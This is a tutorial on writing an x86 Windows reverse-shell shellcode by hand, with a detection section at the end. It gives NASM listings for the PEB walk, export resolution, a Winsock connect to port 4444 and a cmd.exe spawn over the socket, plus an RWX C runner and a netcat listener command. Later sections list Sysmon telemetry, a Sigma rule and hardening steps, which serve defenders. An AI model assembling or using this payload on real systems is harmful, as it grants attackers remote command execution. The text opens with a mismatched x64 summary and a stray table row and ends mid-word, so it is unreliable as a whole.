Reflective Code Loading	`T1620`	Unbacked `RX` memory with PE magic / no module image record

Summary

x64 Windows shellcode is governed by a strict ABI: argument registers RCX/RDX/R8/R9, return in RAX, a 32-byte shadow space, and 16-byte stack alignment at every call.
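The TEB is reached via GS on x64, with the PEB pointer at gs:[0x60]; every offset in the walk (Ldr at +0x18, InMemoryOrderModuleList at +0x20, DllBase at +0x20 from InMemoryOrderLinks) differs from the x86 layout and must be verified against the target build.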
Position-independent API resolution combines a PEB walk to kernel32.dll with an EAT walk using ROR-13 name hashing to avoid embedded strings.
Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative lea, and XOR-then-push idioms.
Detection is layered: Sysmon EventID 8/10 for injection chains, ETW Threat-Intelligence for syscall-level memory writes, behavioural hunts for unbacked RX regions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.

Writing Your First Shellcode: x86 Reverse Shell from Scratch

Objective: Understand how a Windows x86 reverse shell payload is hand-built in NASM assembly — walking the PEB to locate kernel32.dll, parsing the PE export table to resolve GetProcAddress without imports, initialising Winsock, and spawning cmd.exe over a socket — and learn the telemetry each stage emits so you can detect and defend against it.

1. What Is Shellcode? Constraints and Goals

Shellcode is a self-contained blob of machine code that runs after a control-flow hijack (or injection) with no loader, no imports, and no fixed base address. It is the raw payload that tools like msfvenom emit; understanding it byte-by-byte is what lets a defender recognise it in memory.

A Windows x86 reverse shell differs from a Linux equivalent in one fundamental way: Linux exposes a stable syscall/int 0x80 interface, while Windows forces you to call documented Win32 APIs — and you cannot import them, because injected code has no import table. You must therefore find the APIs yourself at runtime.

Constraint	Description
Position independent	Runs at an unknown address; all references are stack-relative or computed
Null-free	`\x00` terminates strings in many injection vectors and truncates the payload
No imports	API addresses must be resolved from loaded modules at runtime
Bad-char aware	`\x00`, `\x0a`, `\x0d` and vector-specific bytes must be avoided by design

Lab setup: a Windows 10 x86 VM, NASM for assembly, WinDbg for stepping the PEB walk, a small C runner to execute the blob, and a Python scanner to audit bad characters. Build and test only in an isolated VM.

2. x86 Calling Conventions and Stack Mechanics

Win32 APIs use stdcall: arguments are pushed right-to-left, and the callee cleans the stack with ret N. This matters because after a successful API call you do not adjust esp yourself — the function already did. cdecl (caller cleans) appears only in CRT helpers you will not touch here.

Convention	Stack Cleanup	Argument Order	Used By
`stdcall`	Callee (`ret N`)	Right-to-left	Win32 APIs (`CreateProcessA`, `WSASocketA`)
`cdecl`	Caller	Right-to-left	CRT functions

eax, ecx, and edx are volatile (caller-saved); ebx, esi, edi, and ebp survive a call. Shellcode exploits this: stash the kernel32 base in ebx and a resolver pointer in ebp, and they persist across every API call. Strings and structures are constructed by pushing dwords onto the stack in reverse, then referencing them directly through esp.

3. The PEB Walk: Finding kernel32.dll Without Imports

Every thread can reach its Process Environment Block (PEB) through the TEB: the pointer sits at FS:[0x30]. The PEB holds Ldr (a PEB_LDR_DATA) at +0x0C, whose InMemoryOrderModuleList at +0x14 is a doubly-linked list of loaded modules. For 32-bit processes on Windows 7 and later the order is conventionally [0] the executable → [1] ntdll.dll → [2] kernel32.dll, although nothing guarantees it. The list head's Flink is the executable's entry, two further Flink dereferences land on kernel32’s entry, and DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

bits 32
    xor    eax, eax
    mov    eax, [fs:0x30]      ; TEB->ProcessEnvironmentBlock (PEB)
    mov    eax, [eax+0x0c]     ; PEB->Ldr (PEB_LDR_DATA)
    mov    eax, [eax+0x14]     ; Ldr->InMemoryOrderModuleList (1st: executable)
    mov    eax, [eax]          ; FLink -> ntdll.dll entry
    mov    eax, [eax]          ; FLink -> kernel32.dll entry
    mov    ebx, [eax+0x10]     ; LDR entry->DllBase (kernel32 base) -> ebx

Verify the chain live in WinDbg before trusting any offset on your target build:

0:000> dt nt!_TEB @$teb ProcessEnvironmentBlock
0:000> dt nt!_PEB @$peb Ldr
0:000> dt nt!_PEB_LDR_DATA poi(@$peb+0xc) InMemoryOrderModuleList
0:000> dl poi(poi(@$peb+0xc)+0x14) 4
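
The 0x10 figure is not arbitrary: it falls out of the pointer size. This small Python sketch derives the relevant LDR_DATA_TABLE_ENTRY offsets for both pointer widths, assuming the documented leading layout of three LIST_ENTRY fields followed by DllBase; the function name is hypothetical.

```python
def ldr_offsets(pointer_size):
    """Offsets at the front of LDR_DATA_TABLE_ENTRY for a given pointer size in bytes."""
    list_entry_size = 2 * pointer_size            # Flink + Blink
    in_memory_order_links = list_entry_size       # follows InLoadOrderLinks
    dll_base = 3 * list_entry_size                # follows the three LIST_ENTRY fields
    return {
        "InMemoryOrderLinks": in_memory_order_links,
        "DllBase": dll_base,
        "DllBase_from_link": dll_base - in_memory_order_links,
    }


for name, size in (("x86", 4), ("x64", 8)):
    offsets = ldr_offsets(size)
    print(name, {field: hex(value) for field, value in offsets.items()})
```

The x86 row reproduces the +0x10 used in the listing above, and the x64 row shows why ported code cannot keep the same constant.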

Figure: The PEB walk from the TEB (PEB pointer at FS:[0x30]) through PEB_LDR_DATA and InMemoryOrderModuleList to kernel32.dll; DllBase sits 0x10 bytes past the InMemoryOrderLinks field.

4. Export Table Parsing: Resolving GetProcAddress

The bootstrap problem: shellcode cannot call GetProcAddress until it has found GetProcAddress. The fix is to parse the kernel32 PE export table manually. From the base, e_lfanew at +0x3C reaches the NT headers; the export-directory RVA lives at NT +0x78; the directory exposes three parallel arrays — AddressOfNames (+0x20), AddressOfNameOrdinals (+0x24), and AddressOfFunctions (+0x1C).

; ebx = kernel32 base
    mov    eax, [ebx+0x3c]     ; e_lfanew
    mov    eax, [ebx+eax+0x78] ; export table RVA
    lea    edi, [ebx+eax]      ; edi -> IMAGE_EXPORT_DIRECTORY
    mov    ecx, [edi+0x20]     ; AddressOfNames RVA
    lea    ecx, [ebx+ecx]      ; -> name-pointer array
    xor    edx, edx            ; name index = 0
.next:
    mov    esi, [ecx+edx*4]    ; RVA of candidate name
    lea    esi, [ebx+esi]      ; -> ASCII name string
    ; compare esi against "GetProcAddress" (string or 4-byte hash) ...
    inc    edx
    jmp    .next
.match:
    mov    eax, [edi+0x24]     ; AddressOfNameOrdinals RVA
    movzx  eax, word [ebx+eax+edx*2]   ; ordinal index for this name
    mov    ecx, [edi+0x1c]     ; AddressOfFunctions RVA
    mov    eax, [ebx+ecx+eax*4]; function RVA
    lea    eax, [ebx+eax]      ; eax = VA of GetProcAddress

Production shellcode usually replaces the literal strcmp with a rolling 4-byte hash of each export name — it is smaller and naturally null-free.
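
The relationship between the three export arrays is the part readers most often get wrong: the name index selects an entry in the ordinal array, and that value, not the name index, selects the function. Here is a minimal Python model of the lookup; the module base, names, and RVAs are made-up sample data and the function name is an assumption.

```python
def resolve_export(base, names, name_ordinals, functions, wanted):
    """Resolve an export name to a virtual address using the three parallel arrays.

    names         : export names, index-aligned with name_ordinals
    name_ordinals : for each name, an index into functions
    functions     : function RVAs, indexed by ordinal index
    """
    for name_index, name in enumerate(names):
        if name == wanted:
            ordinal_index = name_ordinals[name_index]
            return base + functions[ordinal_index]
    return None


# Hypothetical module: note that name order and function order differ.
BASE = 0x10000000
NAMES = ["CreateFileA", "GetProcAddress", "LoadLibraryA"]
NAME_ORDINALS = [2, 0, 1]
FUNCTIONS = [0x2000, 0x3000, 0x1000]

print(hex(resolve_export(BASE, NAMES, NAME_ORDINALS, FUNCTIONS, "GetProcAddress")))
```

Indexing the function array directly with the name index would return the address of a different export, which is a common bug in hand-written resolvers and a useful thing to check when reading one.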

Figure: PE export table structure. Shellcode walks three parallel export arrays (names, ordinals, and functions) to translate a name or name hash into the virtual address of GetProcAddress.

5. Bootstrapping Further API Resolution

Once GetProcAddress is resolved, save it (e.g. in ebp) and use it to resolve everything else. The first follow-up is LoadLibraryA, which lets you bring in ws2_32.dll and resolve the Winsock functions the reverse shell needs.

; ebp = resolved GetProcAddress, ebx = kernel32 base
    xor    ecx, ecx
    push   ecx                 ; terminating null (the 12 characters fill three dwords exactly)
    push   0x41797261          ; "aryA"
    push   0x7262694c          ; "Libr"
    push   0x64616f4c          ; "Load"
    mov    esi, esp            ; esi -> "LoadLibraryA"
    push   esi
    push   ebx                 ; hModule = kernel32
    call   ebp                 ; GetProcAddress -> LoadLibraryA in eax
    ; eax now holds LoadLibraryA; call it on "ws2_32.dll", then resolve
    ; WSAStartup, WSASocketA, WSAConnect, CreateProcessA, ExitProcess.

Each API name is pushed in 4-byte chunks, last chunk first, so that it reads correctly from low to high addresses; because "LoadLibraryA" fills three dwords exactly, a zero dword is pushed first to terminate it. Wrap the resolve-and-call logic in a small subroutine that takes a module base and a name pointer; the reverse shell calls it once for each API listed above.
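
When reading a sample, the reverse operation is what matters: turning a run of pushed immediates back into the string they build. The Python sketch below does that for a sequence given in program order; the function name is an assumption, and the input values are the immediates from the listings in this tutorial plus a zero terminator.

```python
import struct


def stack_string(pushed_dwords):
    """Reconstruct the string built by a sequence of `push imm32` instructions.

    pushed_dwords is in program order. The last push ends up at the lowest
    address, so memory order is the reverse of push order, and each dword is
    stored little-endian.
    """
    memory = b"".join(struct.pack("<I", dword) for dword in reversed(pushed_dwords))
    return memory.split(b"\x00", 1)[0].decode("ascii")


print(repr(stack_string([0x00000000, 0x41797261, 0x7262694C, 0x64616F4C])))
print(repr(stack_string([0x00000000, 0x6578652E, 0x646D6320])))
```

Without the leading zero dword the decoded string would run on into whatever follows on the stack, which is exactly the failure a missing terminator causes at run time.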

6. Winsock Initialisation and Socket Creation

WSAStartup(0x0202, &wsaData) must run before any socket API. Reserve the 400-byte WSADATA on the stack and pass a pointer; the OS fills it. Then WSASocketA(2, 1, 6, NULL, 0, 0) creates a TCP socket (AF_INET, SOCK_STREAM, IPPROTO_TCP).

    sub    esp, 0x190          ; reserve WSADATA (400 bytes)
    push   esp                 ; lpWSAData
    push   0x0202              ; wVersionRequired = 2.2
    call   <WSAStartup>

    xor    eax, eax
    push   eax                 ; dwFlags
    push   eax                 ; g
    push   eax                 ; lpProtocolInfo = NULL
    push   6                   ; IPPROTO_TCP
    push   1                   ; SOCK_STREAM
    push   2                   ; AF_INET
    call   <WSASocketA>        ; eax = socket handle
    mov    edi, eax            ; save socket in edi

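Build the 16-byte SOCKADDR_IN inline and connect. The IP and port are stored in network byte order (big-endian), while push writes its immediate little-endian, so 127.0.0.1 becomes 0x0100007f and the packed family/port dword for port 4444 becomes 0x5c110002. Both immediates contain zero bytes as written, which the audit in §8 will flag.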

    xor    eax, eax
    push   eax                 ; sin_zero[4..8]
    push   eax                 ; sin_zero[0..4]
    push   0x0100007f          ; sin_addr  = 127.0.0.1
    push   0x5c110002          ; sin_port 4444 | sin_family AF_INET
    mov    esi, esp            ; esi -> SOCKADDR_IN

    push   eax                 ; lpCallee/QoS chain (NULLs)
    push   eax
    push   eax
    push   eax
    push   0x10                ; namelen
    push   esi                 ; name -> SOCKADDR_IN
    push   edi                 ; socket
    call   <WSAConnect>
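
The two constants in the SOCKADDR_IN listing are a frequent source of byte-order mistakes, and they are also what an analyst decodes to recover the address and port from a sample. This Python sketch packs the structure and reads it back as little-endian dwords; the function name is an assumption, and AF_INET is hard-coded to its Windows value of 2.

```python
import socket
import struct

AF_INET = 2  # address family value used by Winsock


def sockaddr_in_dwords(ip, port):
    """Return the four little-endian dwords that make up a SOCKADDR_IN."""
    raw = (struct.pack("<H", AF_INET)      # sin_family, host byte order
           + struct.pack(">H", port)       # sin_port, network byte order
           + socket.inet_aton(ip)          # sin_addr, network byte order
           + b"\x00" * 8)                  # sin_zero
    return list(struct.unpack("<4I", raw))


print([hex(dword) for dword in sockaddr_in_dwords("127.0.0.1", 4444)])
```

The first two values match the immediates in the listing, and both visibly contain zero bytes, which is why loopback addresses and low family values are awkward in null-free code.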

7. Spawning cmd.exe Over the Socket

The final stage is the most error-prone: a fully populated 68-byte STARTUPINFOA with cb = 0x44, dwFlags = STARTF_USESTDHANDLES (0x100), and all three standard handles pointed at the connected socket. CreateProcessA(NULL, " cmd.exe", ...) then launches the shell with stdin/stdout/stderr riding the TCP stream.

    xor    eax, eax
    push   edi                 ; hStdError  = socket              (+0x40)
    push   edi                 ; hStdOutput = socket              (+0x3C)
    push   edi                 ; hStdInput  = socket              (+0x38)
    times 2 push eax           ; lpReserved2, cbReserved2/wShowWindow (+0x34, +0x30)
    push   0x00000100          ; dwFlags = STARTF_USESTDHANDLES   (+0x2C)
    times 10 push eax          ; dwFillAttribute down to lpReserved (+0x28 .. +0x04)
    push   0x44                ; cb = sizeof(STARTUPINFOA)        (+0x00)
    mov    ebx, esp            ; ebx -> STARTUPINFOA (17 dwords = 68 bytes)

    sub    esp, 0x10
    mov    esi, esp            ; esi -> PROCESS_INFORMATION

    push   eax                 ; "....\0" terminator (runtime-supplied null)
    push   0x6578652e          ; ".exe"
    push   0x646d6320          ; " cmd"  (0x20 = space, null-free)
    mov    edx, esp            ; edx -> " cmd.exe"

    push   esi                 ; lpProcessInformation
    push   ebx                 ; lpStartupInfo
    push   eax                 ; lpCurrentDirectory
    push   eax                 ; lpEnvironment
    push   eax                 ; dwCreationFlags
    inc    eax
    push   eax                 ; bInheritHandles = TRUE
    dec    eax
    push   eax                 ; lpThreadAttributes
    push   eax                 ; lpProcessAttributes
    push   edx                 ; lpCommandLine = " cmd.exe"
    push   eax                 ; lpApplicationName = NULL
    call   <CreateProcessA>

    push   eax                 ; uExitCode
    call   <ExitProcess>
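
Because the structure is built backwards one dword at a time, it helps to have the field offsets in front of you. Here is a minimal Python sketch that models the 32-bit STARTUPINFOA layout with ctypes and prints the offsets that matter; pointers and handles are modelled as 32-bit integers, and the class name is an assumption.

```python
import ctypes

u16, u32 = ctypes.c_uint16, ctypes.c_uint32


class STARTUPINFOA32(ctypes.Structure):
    # 32-bit layout: every pointer and handle is 4 bytes wide.
    _fields_ = [("cb", u32), ("lpReserved", u32), ("lpDesktop", u32), ("lpTitle", u32),
                ("dwX", u32), ("dwY", u32), ("dwXSize", u32), ("dwYSize", u32),
                ("dwXCountChars", u32), ("dwYCountChars", u32),
                ("dwFillAttribute", u32), ("dwFlags", u32),
                ("wShowWindow", u16), ("cbReserved2", u16),
                ("lpReserved2", u32),
                ("hStdInput", u32), ("hStdOutput", u32), ("hStdError", u32)]


print(f"sizeof     = 0x{ctypes.sizeof(STARTUPINFOA32):02X}")
for field in ("dwFlags", "hStdInput", "hStdOutput", "hStdError"):
    print(f"{field:<10} = +0x{getattr(STARTUPINFOA32, field).offset:02X}")
```

Counting from the end of the structure, two dwords separate hStdInput from dwFlags and ten separate dwFlags from cb, for 17 dwords in total.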

Figure: The full reverse shell execution chain. Every stage builds on the last: the PEB walk feeds export parsing, which unlocks Winsock, which provides the socket handle wired into cmd.exe’s standard I/O.

8. Null-Byte Elimination and Bad-Character Audit

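A single \x00 mid-payload truncates your shellcode whenever it is delivered through a string-handling routine such as strcpy, which stops copying at the first null. Other vectors add their own bad characters (CR/LF for line-based protocols, for example). Design them out from the start.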

Bad Byte	Naive Source	Null-Free Replacement
`\x00`	`mov ecx, 0`	`xor ecx, ecx`
`\x00` in string	`push 0x00657865` (“exe\0”)	terminator from `push eax` after `xor eax,eax`
`\x00` in `mov al,0`	`mov al, 0`	`xor eax, eax` then use `al`
`\x0a` / `\x0d`	constant containing CR/LF	re-encode IP/port or split the immediate

The runtime-supplied terminator trick (xor eax, eax → push eax) keeps the " cmd.exe" string null-free. Padding " cmd" with a leading space fills the dword without a null, and CreateProcessA's command-line parser tolerates the leading space. Audit the assembled binary with a scanner:

import sys
BAD = {0x00, 0x0a, 0x0d}                # extend per injection vector

with open(sys.argv[1], "rb") as f:
    sc = f.read()
for i, b in enumerate(sc):
    if b in BAD:
        print(f"[!] bad char 0x{b:02x} at offset {i}")
print(f"[*] {len(sc)} bytes scanned")
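
The stack-string constants can be checked the same way before assembling. The sketch below is an illustration rather than part of the original toolchain: decode_stack_string and has_bad_bytes are hypothetical helper names. It rebuilds the bytes that a series of 32-bit pushes leaves in memory and flags immediates that would encode a bad character.

```python
import struct

BAD = frozenset({0x00, 0x0a, 0x0d})     # same default set as the scanner


def decode_stack_string(pushed_dwords):
    """Rebuild the bytes left in memory by 32-bit pushes.

    pushed_dwords is in program order. The stack grows downward, so the
    last value pushed sits at the lowest address and is read first.
    """
    return b"".join(struct.pack("<I", d) for d in reversed(pushed_dwords))


def has_bad_bytes(immediate, bad=BAD):
    """True if the little-endian encoding of a 32-bit immediate hits BAD."""
    return any(b in bad for b in struct.pack("<I", immediate))


# Program order: the zeroed register first, then ".exe", then " cmd".
pushes = [0x00000000, 0x6578652e, 0x646d6320]
memory = decode_stack_string(pushes)
print(memory.split(b"\x00")[0])          # b' cmd.exe'

# The terminator comes from a zeroed register, so only the two
# immediates are ever encoded in the instruction stream.
for imm in pushes[1:]:
    print(f"0x{imm:08x} bad={has_bad_bytes(imm)}")
```

The naive constant from the table, 0x00657865, fails the same check because its top byte is a null, which is why the terminator is pushed from a zeroed register instead.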

9. Testing and Verification

Assemble to a flat binary, then execute it in a controlled runner that mirrors how an exploit lands code in memory — VirtualAlloc with PAGE_EXECUTE_READWRITE, copy, and call through a function pointer.

nasm -f bin reverse.asm -o reverse.bin
python3 badchars.py reverse.bin

#include <windows.h>
#include <string.h>
unsigned char sc[] = { /* contents of reverse.bin */ };

int main(void) {
    void *mem = VirtualAlloc(NULL, sizeof(sc),
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);   // RWX: loud, lab-only
    if (mem == NULL) return 1;                          // allocation failed
    memcpy(mem, sc, sizeof(sc));                        // stage the payload
    ((void(*)(void))mem)();                             // call it as a function
    return 0;
}

Catch the callback with nc -lvnp 4444. Note the RWX allocation — real-world loaders allocate RW, copy, then flip to RX with VirtualProtect precisely because PAGE_EXECUTE_READWRITE is a classic detection signal.

10. Common Attacker Techniques

Technique	Description
PEB walk	Locate `kernel32.dll` base with no imports via `FS:[0x30]`
Export hashing	Resolve APIs by name hash to stay small and null-free
Stack string building	Push reversed dwords to stage `" cmd.exe"`, `ws2_32.dll`, API names
STDIO redirection	Point `hStdInput/Output/Error` at the socket for an interactive shell
Process injection	Deliver the blob via `VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread`
RWX → RX staging	Allocate `RW`, copy, `VirtualProtect` to `RX` to evade RWX heuristics

11. Defensive Strategies and Detection

Each shellcode stage emits telemetry. Map detections to the chain, not to a single indicator.

Sysmon Event ID	Name	What It Catches
`1`	Process Create	`cmd.exe` with an unexpected `ParentImage` / `ParentCommandLine`
`3`	Network Connection	Outbound TCP initiated by the process hosting the shellcode or another non-browser binary (C2 connect-back)
`8`	CreateRemoteThread	Cross-process thread where `SourceImage` ≠ `TargetImage`
`10`	ProcessAccess	Handle opened to another process with an injection-capable `GrantedAccess` mask; `CallTrace` containing `UNKNOWN` (caller running from memory not backed by a module)
`11`	FileCreate	Shellcode or loader dropped to disk

Windows Security auditing adds Event 4688 (process creation with command line, when ProcessCreationIncludeCmdLine_Enabled = 1), 5156 (WFP outbound TCP allowed — the reverse connect at the network layer), and 4689 (process exit, for shell-lifetime correlation). The kernel Microsoft-Windows-Threat-Intelligence ETW provider emits KERNEL_THREATINT_TASK_ALLOCVM/PROTECTVM on RWX activity but requires a signed ELAM/PPL consumer.

A representative community-style Sigma rule for shellcode injection keys on ProcessAccess:

title: Shellcode Process Injection via Suspicious ProcessAccess
logsource:
  category: process_access
  product: windows
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
tags:
  - attack.defense_evasion
  - attack.privilege_escalation
  - attack.t1055
level: high
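
To make the rule's logic concrete, here is a minimal sketch of the same selection evaluated against a Sysmon EID 10 event that has already been parsed into a dictionary. The function name matches_rule and the sample events are hypothetical; only the field names GrantedAccess and CallTrace come from the rule. It assumes Sigma's default case-insensitive string matching, so both fields are lowercased before comparison.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}


def matches_rule(event):
    """Return True when both selection conditions hold (logical AND)."""
    granted = str(event.get("GrantedAccess", "")).lower()
    call_trace = str(event.get("CallTrace", "")).lower()
    return granted in SUSPICIOUS_ACCESS and "unknown" in call_trace


# Hypothetical events for illustration only.
injected = {
    "GrantedAccess": "0x1F3FFF",
    "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(000001F0A1B2C3D4)",
}
benign = {
    "GrantedAccess": "0x1000",
    "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4",
}

print(matches_rule(injected))   # True
print(matches_rule(benign))     # False
```

Both conditions have to match: a high-privilege access mask on its own is common among legitimate tools, and it is the unbacked caller in the call trace that makes the combination worth alerting on.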

Hardening: enable command-line auditing; deploy a tuned Sysmon baseline (SwiftOnSecurity / Olaf Hartong) for EIDs 1/3/8/10; enforce default-deny egress on workstations, since a reverse shell needs outbound TCP; apply ASR rules such as D4F940AB-401B-4EFC-AADC-AD5F3C50688A (block Office applications from creating child processes) and D3E037E1-3EB8-44C8-A917-57927947596D (block JavaScript or VBScript from launching downloaded executable content); and alert on RWX allocations (VirtualAlloc with PAGE_EXECUTE_READWRITE). AMSI does not see raw shellcode but catches PowerShell/VBScript loaders.

Figure: Each shellcode execution stage mapped to its detection telemetry source, including Windows Event IDs, Sysmon event IDs, ETW providers, ASR rules, and egress firewall controls. Effective defence maps detections to each stage of the kill chain rather than relying on a single indicator: RWX allocation, outbound TCP, and process creation each emit distinct, correlatable telemetry.
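
As an illustration of chain-level correlation, the sketch below pairs a Sysmon EID 3 outbound connection with an EID 1 cmd.exe creation whose parent is the connecting process. It assumes events have already been parsed into dictionaries that use Sysmon's field names (UtcTime, ProcessGuid, ParentProcessGuid, Image, Initiated); the function correlate, the 30-second window, and the sample events are hypothetical choices, not a tuned detection.

```python
from datetime import datetime, timedelta

TIME_FORMAT = "%Y-%m-%d %H:%M:%S.%f"     # Sysmon UtcTime layout


def parse_time(value):
    return datetime.strptime(value, TIME_FORMAT)


def correlate(events, window=timedelta(seconds=30)):
    """Pair outbound connects with cmd.exe children of the same process."""
    connects = {}                         # ProcessGuid -> [(time, event)]
    hits = []
    for ev in sorted(events, key=lambda e: parse_time(e["UtcTime"])):
        when = parse_time(ev["UtcTime"])
        if ev["EventID"] == 3 and ev.get("Initiated") == "true":
            connects.setdefault(ev["ProcessGuid"], []).append((when, ev))
        elif ev["EventID"] == 1 and ev["Image"].lower().endswith("\\cmd.exe"):
            for seen, conn in connects.get(ev["ParentProcessGuid"], []):
                if when - seen <= window:
                    hits.append((conn, ev))
    return hits


# Hypothetical events; GUIDs shortened for readability.
sample = [
    {"EventID": 3, "UtcTime": "2024-01-01 12:00:00.000", "ProcessGuid": "{A}",
     "Image": r"C:\Lab\runner.exe", "Initiated": "true",
     "DestinationIp": "192.0.2.10", "DestinationPort": "4444"},
    {"EventID": 1, "UtcTime": "2024-01-01 12:00:01.500", "ProcessGuid": "{B}",
     "ParentProcessGuid": "{A}", "Image": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "UtcTime": "2024-01-01 12:05:00.000", "ProcessGuid": "{C}",
     "ParentProcessGuid": "{D}", "Image": r"C:\Windows\System32\cmd.exe"},
]

for conn, proc in correlate(sample):
    print(conn["Image"], "->", conn["DestinationIp"], "then", proc["Image"])
```

Joining on ProcessGuid rather than the process ID avoids false pairings when IDs are reused, and the time window keeps a long-running process with a single early connection from matching every later child.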

12. Tools for Shellcode Analysis

Tool	Description	Link
NASM	Assemble x86 to flat binary	`nasm.us`
WinDbg	Step the PEB walk and export parse live	`microsoft.com`
x64dbg	Dynamic analysis of the loader and payload	`x64dbg.com`
Ghidra	Static disassembly of extracted shellcode	`ghidra-sre.org`
Radare2	Lightweight disassembly and patching	`radare.org`
Sysmon	Generate EID 1/3/8/10 detection telemetry	`microsoft.com`
Volatility	Memory forensics — recover RWX regions and injected code	`volatilityfoundation.org`

13. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Command and Scripting Interpreter: Windows Command Shell	`T1059.003`	Sysmon EID 1 / 4688 `cmd.exe` spawn chain
Process Injection	`T1055`	Sysmon EID 10 `GrantedAccess` + `CallTrace UNKNOWN`
Process Injection: DLL Injection	`T1055.001`	Sysmon EID 7/8 on reflective-DLL delivery
Obfuscated Files or Information	`T1027`	Null-free/encoded IP/port constants in the blob
Non-Application Layer Protocol	`T1095`	Sysmon EID 3 / 5156 raw TCP from non-browser process
Application Layer Protocol: Web Protocols	`T1071.001`	Proxy/TLS inspection (contrast C2 transport)
System Information Discovery	`T1082`	PEB walk as in-memory module discovery
Native API	`T1106`	Direct `WSASocketA` / `CreateProcessA` calls without framework APIs

Summary

A Windows x86 reverse shell is just position-independent code that resolves its own APIs, opens a TCP socket, and redirects cmd.exe over it.
The PEB walk (FS:[0x30] → Ldr → InMemoryOrderModuleList, third entry) locates kernel32.dll with no imports.
Parsing the PE export table resolves GetProcAddress, which bootstraps LoadLibraryA and every Winsock function.
Null-byte and bad-character avoidance is a design constraint, not a post-step — xor for zero, reversed stack strings, runtime-supplied terminators.
Det
